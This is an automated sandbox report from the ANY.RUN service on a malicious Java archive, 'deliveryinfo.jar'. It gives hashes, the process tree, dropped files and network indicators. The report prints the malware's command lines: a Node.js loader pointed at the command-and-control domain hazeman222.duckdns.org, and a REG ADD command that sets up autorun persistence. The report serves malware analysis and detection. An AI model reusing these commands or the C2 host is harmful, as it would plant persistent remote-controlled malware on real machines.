download:

deliveryinfo.jar

Full analysis: https://app.any.run/tasks/54eefd28-e707-4a1f-b45d-9dee8f2f2f89
Verdict: Malicious activity
Analysis date: September 30, 2020, 03:23:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/java-archive
File info: Java archive data (JAR)
MD5:

724141C6922AB8E19C262D269AA8AEE1

SHA1:

0D2BF53FA5138AA22B1585F5C5093DFBE65DFCD0

SHA256:

A3B9D353EF66B0E9F9920E9F4D520E67E40F9F8AC855EDF42BFA3BE4492FCF1D

SSDEEP:

12288:whSM3uQPBuy9mwsG+BXT4zsvuXEAr/qWy5khwG/:whSUuQpBxsG+NT4dXrriWGSH/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes the autorun value in the registry

      • reg.exe (PID: 3420)

  • SUSPICIOUS

    • Creates files in the user directory

      • javaw.exe (PID: 572)

    • Starts CMD.EXE for commands execution

      • node.exe (PID: 2932)

    • Application launched itself

      • javaw.exe (PID: 2280)
      • node.exe (PID: 1208)
      • node.exe (PID: 3968)

    • Executable content was dropped or overwritten

      • javaw.exe (PID: 572)

    • Executes JAVA applets

      • javaw.exe (PID: 2280)

    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3996)

    • Reads CPU info

      • node.exe (PID: 2932)

  • INFO

    • Dropped object may contain Bitcoin addresses

      • javaw.exe (PID: 572)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.jar | Java Archive (78.3)
.zip | ZIP compressed archive (21.6)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0808
ZipCompression: Deflated
ZipModifyDate: 2020:09:25 16:24:26
ZipCRC: 0x00000000
ZipCompressedSize: 2
ZipUncompressedSize: -
ZipFileName: META-INF/
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
7
Malicious processes
0
Suspicious processes
5

Behavior graph

Click at the process to see the details
start javaw.exe no specs javaw.exe node.exe node.exe no specs node.exe cmd.exe no specs reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
572"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar C:\Users\admin\AppData\Local\Temp\4e5716af.tmpC:\Program Files\Java\jre1.8.0_92\bin\javaw.exe
javaw.exe
User:
admin
Company:
Oracle Corporation
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
0
Version:
8.0.920.14
Modules
Images
c:\program files\java\jre1.8.0_92\bin\javaw.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1208C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.orgC:\Users\admin\node-v14.12.0-win-x86\node.exenode.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js: Server-side JavaScript
Exit code:
0
Version:
14.12.0
Modules
Images
c:\users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
2280"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\deliveryinfo.jar"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exeexplorer.exe
User:
admin
Company:
Oracle Corporation
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
0
Version:
8.0.920.14
Modules
Images
c:\program files\java\jre1.8.0_92\bin\javaw.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2932C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.orgC:\Users\admin\node-v14.12.0-win-x86\node.exe
node.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js: Server-side JavaScript
Exit code:
0
Version:
14.12.0
Modules
Images
c:\users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
3420REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e8529f2a-975c-451b-9760-2a0bb1500d9d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\""C:\Windows\system32\reg.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3968C:\Users\admin\node-v14.12.0-win-x86\node.exe - --hub-domain hazeman222.duckdns.orgC:\Users\admin\node-v14.12.0-win-x86\node.exe
javaw.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js: Server-side JavaScript
Exit code:
0
Version:
14.12.0
Modules
Images
c:\users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
3996C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e8529f2a-975c-451b-9760-2a0bb1500d9d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\"""C:\Windows\system32\cmd.exenode.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
39
Read events
38
Write events
1
Delete events
0

Modification events

(PID) Process:(3420) reg.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:e8529f2a-975c-451b-9760-2a0bb1500d9d
Value:
cmd /D /C "C:\Users\admin\qhub\node\2.0.10\boot.vbs"
Executable files
2
Suspicious files
2
Text files
3 597
Unknown types
7

Dropped files

PID
Process
Filename
Type
572javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node.exe
MD5:
SHA256:
2280javaw.exeC:\Users\admin\AppData\Local\Temp\4e5716af.tmpjava
MD5:
SHA256:
572javaw.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamptext
MD5:
SHA256:
2280javaw.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamptext
MD5:
SHA256:
572javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\CHANGELOG.mdhtml
MD5:5F15C768C60610B0F12C9BDE18D5EF36
SHA256:5025CB1E5A255FB05B0E1263BE2AE9652EC95B0D380FCEBF88863E8BADF1B894
572javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\LICENSEtext
MD5:A249503208BA72F4ABC790A08C1025C5
SHA256:6C351F95A850B485A662E8B43003D8CA56CD663BE625981D7203A05D2CF587E0
572javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node_modules\npm\.mailmaptext
MD5:50FF5F4745B5210D1DDC6CB3AD21216B
SHA256:EC219650D5ED44D58B1F6CD6E8CCC116E118D7569E09ED19E9B80F5C8BE87D5B
572javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\install_tools.battext
MD5:2CD17E6D9A33A0BD00C2E18E6D41BC6F
SHA256:C7C05DE977EEFD931B54B482405C87A2F002AF3BC83A9C2FECA21B05915983B9
572javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node_etw_provider.mantext
MD5:1D51E18A7247F47245B0751F16119498
SHA256:1975AA34C1050B8364491394CEBF6E668E2337C3107712E3EECA311262C7C46F
572javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node_modules\npm\.licensee.jsontext
MD5:B133415ABE39E5C1865AAD84712B3941
SHA256:66218BC67A524799BA7CCAD7C493A8D24EEED81C07BED24E0C3034ABA6014061
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
6
DNS requests
3
Threats
3

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
572
javaw.exe
104.20.22.46:443
nodejs.org
Cloudflare Inc
US
shared
3968
node.exe
94.156.189.108:443
hazeman222.duckdns.org
BelCloud Hosting Corporation
BG
unknown
2932
node.exe
94.156.189.108:443
hazeman222.duckdns.org
BelCloud Hosting Corporation
BG
unknown
2932
node.exe
95.217.228.176:443
wtfismyip.com
Hetzner Online GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
nodejs.org
  • 104.20.22.46
  • 104.20.23.46
whitelisted
hazeman222.duckdns.org
  • 94.156.189.108
malicious
wtfismyip.com
  • 95.217.228.176
shared

Threats

PID
Process
Class
Message
1056
svchost.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
deliveryinfo.jar